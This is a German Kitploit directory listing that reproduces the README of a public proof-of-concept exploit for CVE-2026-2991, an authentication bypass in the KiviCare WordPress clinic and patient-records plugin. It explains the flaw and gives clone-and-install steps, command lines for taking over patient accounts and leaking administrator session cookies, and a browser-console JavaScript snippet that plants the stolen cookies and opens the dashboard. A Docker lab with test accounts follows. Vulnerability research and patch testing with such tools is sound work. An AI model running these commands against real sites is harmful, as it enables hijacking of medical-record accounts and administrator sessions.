Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-2991 — PoC-Exploit für CVE-2026-2991 — Authentifizierungsumgehung im KiviCare-WordPress-Plugin (≤4.1.2), die es nicht authentifizierten Angreifern ermöglicht, Patienten-Konten zu übernehmen und Admin-Sitzungen zu extrahieren. | Kitploit
Tools/GitHubGitHub/joshuavanderpoll/cve-2026-2991
Authentifizierung & AutorisierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubjoshuavanderpoll/cve-2026-2991

CVE-2026-2991

PoC-Exploit für CVE-2026-2991 — Authentifizierungsumgehung im KiviCare-WordPress-Plugin (≤4.1.2), die es nicht authentifizierten Angreifern ermöglicht, Patienten-Konten zu übernehmen und Admin-Sitzungen zu extrahieren.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigenWebseite
2vor 5 MonatenNoch nicht geprüft

KiviCare <= 4.1.2 - Authentication Bypass (CVE-2026-2991) PoC

Python

📜 Beschreibung

CVE-2026-2991 ist eine Schwachstelle zur Umgehung der Authentifizierung im KiviCare – Clinic & Patient Management System (EHR)-WordPress-Plugin, die alle Versionen bis einschließlich 4.1.2 betrifft.

Das Plugin stellt einen öffentlichen REST-Endpunkt unter /wp-json/kivicare/v1/auth/patient/social-login bereit, der Benutzer über Social Login authentifiziert. Die Funktion patientSocialLogin() akzeptiert eine E-Mail-Adresse und ein Zugriffstoken, validiert das Token jedoch niemals gegenüber dem angegebenen Social-Provider. Jeder nicht authentifizierte Angreifer kann sich als beliebiger registrierter Patient anmelden, indem er lediglich eine E-Mail-Adresse und eine beliebige Zeichenkette als Token angibt.

Darüber hinaus werden die WordPress-Authentifizierungscookies vor der Überprüfung der Patientenrolle ausgestellt. Das bedeutet, dass die Antwort für Nicht-Patientenkonten (einschließlich Administratoren) HTTP 403 zurückgibt, aber dennoch gültige Set-Cookie-Header enthält – wodurch eine wiederverwendbare Admin-Sitzung an den Angreifer gelangt.

Betroffene Versionen: kivicare-clinic-management-system <= 4.1.2

✨ Funktionen

  • Ohne Authentifizierung — Keine Anmeldedaten oder vorherige Sitzung erforderlich
  • Übernahme von Patientenkonten — Melden Sie sich mit nur der E-Mail-Adresse als beliebiger registrierter Patient an
  • Admin-Sitzungsleck — Extrahiert gültige Admin-Auth-Cookies aus der 403-Antwort für Nicht-Patientenkonten
  • Browser-Konsolen-Snippet — Gibt einsatzbereites JavaScript zum Einfügen aus, um Cookies zu injizieren und direkt zum Dashboard umzuleiten

OSX/Linux

root@kitploit:~
git clone https://github.com/joshuavanderpoll/CVE-2026-2991.git
cd CVE-2026-2991
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt

Windows

root@kitploit:~
git clone https://github.com/joshuavanderpoll/CVE-2026-2991.git
cd CVE-2026-2991
python3 -m venv .venv
.venv\Scripts\activate
pip3 install -r requirements.txt

⚙️ Verwendung

root@kitploit:~
python3 CVE-2026-2991.py --url <TARGET_URL> --email <TARGET_EMAIL> [--login-type <google|apple>] [--timeout <SECONDS>] [--useragent <UA>]

Übernahme von Patientenkonten

Umgehen Sie die Authentifizierung für einen registrierten Patienten. Das Skript gibt dessen vollständige Sitzung zurück, einschließlich eines Nonce und wiederverwendbarer Cookies.

root@kitploit:~
python3 CVE-2026-2991.py --url 'https://target.com' --email '[email protected]'

Patient bypass


Admin-Sitzungsleck (Nicht-Patientenkonto)

Geben Sie die E-Mail-Adresse eines beliebigen Nicht-Patienten-Benutzers an (z. B. eines Administrators). Der Endpunkt stellt gültige Auth-Cookies vor der Rollenprüfung aus und gibt 403 zurück – diese Cookies werden extrahiert und ausgegeben.

root@kitploit:~
python3 CVE-2026-2991.py  --url http://localhost:8080/ --email '[email protected]'

Admin cookie leak


Anmeldung über die Browser-Konsole

Nach einem erfolgreichen Lauf gibt das Skript ein JavaScript-Snippet aus. Öffnen Sie die Zielwebsite in Ihrem Browser, fügen Sie das Snippet in die Browser-Konsole ein (F12 → Konsole) und drücken Sie die Eingabetaste – es setzt die gestohlenen Cookies und navigiert Sie automatisch zum Dashboard.

root@kitploit:~
(() => {
  document.cookie = "wordpress_<hash>=<value>; path=/";
  document.cookie = "wordpress_logged_in_<hash>=<value>; path=/";
  window.location.href = "http://target.com/kivicare-patient-dashboard";
})();

🐋 Docker PoC

Eine eigenständige Docker-Compose-Umgebung, in der das verwundbare Plugin vorinstalliert und mit realistischen Testdaten befüllt ist. Weitere Details finden Sie in DOCKER.md.

root@kitploit:~
cd docker/
docker compose up

Die Testumgebung legt beim ersten Start die folgenden Konten an:

root@kitploit:~
# Bypass a patient
python3 CVE-2026-2991.py --url 'http://localhost:8080' --email '[email protected]'

# Leak admin session cookies
python3 CVE-2026-2991.py --url 'http://localhost:8080' --email '[email protected]'

🕵🏼 Referenzen

  • KiviCare — WordPress Plugin
  • NVD — CVE-2026-2991
  • WordFence
  • HackIndex.io — CVE-2026-2991

📢 Haftungsausschluss

Dieses Tool wird ausschließlich zu Bildungs- und Forschungszwecken bereitgestellt. Der Ersteller übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.

Tool herunterladen
RolleBenutzernameE-MailPasswort
Adminadmin[email protected]admin
Arztdr.harris[email protected]Doctor@123
Arztdr.chen[email protected]Doctor@123
Arztdr.okonkwo[email protected]Doctor@123
Patientjames.ford[email protected]Patient@123
Patientsofia.reyes[email protected]Patient@123
Patientoliver.knight[email protected]Patient@123
Patientamara.diallo[email protected]Patient@123
Patientdan.walsh[email protected]Patient@123